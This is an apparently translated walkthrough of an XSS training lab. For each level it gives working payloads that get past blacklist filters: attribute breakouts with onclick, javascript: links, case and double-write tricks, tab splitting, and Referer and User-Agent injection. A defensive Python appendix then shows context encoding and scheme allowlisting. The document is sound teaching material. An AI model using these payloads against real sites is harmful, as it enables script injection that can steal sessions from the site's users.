XSS learning XSS lab problem solution
2022-07-06 01:21:00 【ThnPkm】
Catalog
level 3 Single quote closure + Add event
level 4 Double quotes closed + Add event
level 5 JavaScript Fake protocol
level 7 Double writing bypasses
level 9 code + Detect keywords
XSS type
level 1 No filtering
There is no protection at all, so pass the XSS payload directly in the URL:
name=<script>alert(1)</script>
level 2 input closed
There is an input tag, so try closing it with ">
(In the page source, the data we enter lands inside the value attribute of the form field, so we first close the input tag, then inject the code, then close the tag again.)
"><script>alert(1)</script>
level 3 Single quote closure + Add event
Testing shows that angle brackets are converted to character entities, and in this level the value is enclosed in single quotes.
Since a script tag cannot be used, change approach: use an event attribute on the form element to call alert(), closing the single quotes before and after it.
' onclick='alert(1)
level 4 Double quotes closed + Add event
After testing and viewing the source, <> is filtered and the value is enclosed in double quotes.
The bypass is similar to the previous level.
test" onclick="alert(1)
level 5 JavaScript Fake protocol
This level converts ri to r_i, so look for a way around that mechanism.
It also turns out that on is filtered, and since every event attribute starts with on, events cannot be used here.
Construct a payload that closes the original tag and creates a new a tag.
The a tag uses a javascript: hyperlink to trigger the popup.
"><a href="javascript:alert(1)">link</a>
level 6 Case bypass
After testing, the keywords are still filtered.
Try the level 5 payload "><a href="javascript:alert(1)">link</a>
This level's filter does not handle case, so writing HREF in capitals works.
Any tag can be used; just switch to capitals or mixed case:
"><a HREF="javascript:alert(1)">link</a>
"><SCRIPT>alert(1)</SCRIPT>
level 7 Double writing bypasses
Testing shows the keyword is filtered by replacing it with an empty string (it is simply deleted), so consider double-writing the keyword:
"><scscriptript>alert(1)</scscriptript>
level 8 Code bypass
Keywords are filtered, and this level renders an a link, so that is where we work.
script written with an HTML character entity still decodes back to script.
Construct the payload:
javascript:alert(1)
There is another way through this level using the Tab key: split script with a tab character.
javasc ript:alert(1)
level 9 code + Detect keywords
Reuse the level 8 payload and observe the echoed response.
The payload has to be followed by http://:
javasc ript:alert(1)//http://
javascript:alert(1)//http://
level 10 Hidden information
There is no visible input point on the page; the input fields are hidden.
Open F12 and remove the hidden attribute. Since angle brackets are filtered, use an event:
"type="text" onclick="alert(1)
It also works to fill it in directly in the URL:
/level10.php?t_sort="onclick=alert(1) type=text"
level 11 Referer
Looking at the write-up, I don't quite understand it; the gist is to capture the request and modify the Referer.
After capturing the packet, adding a Referer header makes the input injection possible.
Then modify the Referer to carry out the XSS:
referer: "type="text" onclick="alert(1)
Then forward the packet.
level 12 User-agent
This level again uses the UA, that is, the User-Agent.
So again we target the User-Agent for the XSS; capturing the request, it looks like this.
Simply append the payload to the UA.
Forward the packet.
level 13 cookie
This time it is the cookie. I tried the old method, but something is wrong with the document here and it doesn't come out; looking at the write-up, the idea is the same as the previous two levels.
level 16 Space entity escape
script, spaces and / are filtered (replaced), but <> is not filtered, so we construct the statement:
<img
src="111"
onerror=alert(1)
>
%0a (a URL-encoded line break) can be used as the separator, that is:
<img%0asrc="111"%0aonerror=alert(1)%0a>
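As an added defender's-eye example (not part of the original write-up or of the lab's code), the following Python models the blacklist behaviour described in the levels above and contrasts it with the fix that holds across all of them: encode output for its HTML context and allowlist URL schemes after browser-style normalisation. The filter functions, the hypothetical input template and the constructed entity sample are assumptions, not the lab's own source.

```python
import html
import re
from typing import Optional
from urllib.parse import urlsplit

# --- Constructed models of the lab's blacklist filters (assumptions based only
# on the behaviour the write-up describes; not the lab's own source) ----------

def filter_delete_keyword(value: str) -> str:
    """Level 7 style: the keyword is replaced with the empty string in a single
    pass, so a double-written 'scscriptript' collapses back into 'script'."""
    return value.replace("script", "")

def filter_mangle_keyword(value: str) -> str:
    """Level 5/6 style: case-sensitive mangling ('<script' -> '<scr_ipt' as the
    write-up's ri -> r_i; 'href' -> 'hr_ef' is an assumed analogue), so an
    upper-case HREF is left untouched."""
    return value.replace("<script", "<scr_ipt").replace("href", "hr_ef")

def filter_requires_http(url: str) -> bool:
    """Level 9 style: only checks that 'http://' appears somewhere in the URL."""
    return "http://" in url

# --- Defender side: encode for the output context instead of blacklisting ----

def render_value_attribute(user_input: str) -> str:
    """Reflect input into a double-quoted attribute using HTML attribute encoding
    (hypothetical template; html.escape encodes & < > " and ')."""
    return '<input name="keyword" value="%s">' % html.escape(user_input, quote=True)

_ATTR_OK = re.compile(
    r'<input name="keyword" value="(?:[^"\'<>&]|&(?:amp|lt|gt|quot|#x27);)*">')

def attribute_intact(rendered: str) -> bool:
    """True when the value never leaves its quoted attribute: no raw quote, <, >
    or & survives, only the five entities html.escape emits."""
    return _ATTR_OK.fullmatch(rendered) is not None

_ALLOWED_SCHEMES = {"http", "https"}

def safe_link(user_url: str) -> Optional[str]:
    """Allowlist the URL scheme after normalising the way a browser would:
    decode character entities (level 8 trick), strip ASCII control characters
    such as tab and newline (level 8/16 trick), then parse the scheme instead
    of looking for 'http://' as a substring (level 9)."""
    cleaned = re.sub(r"[\x00-\x20\x7f]", "", html.unescape(user_url))
    scheme = urlsplit(cleaned).scheme.lower()
    return cleaned if scheme in _ALLOWED_SCHEMES else None
```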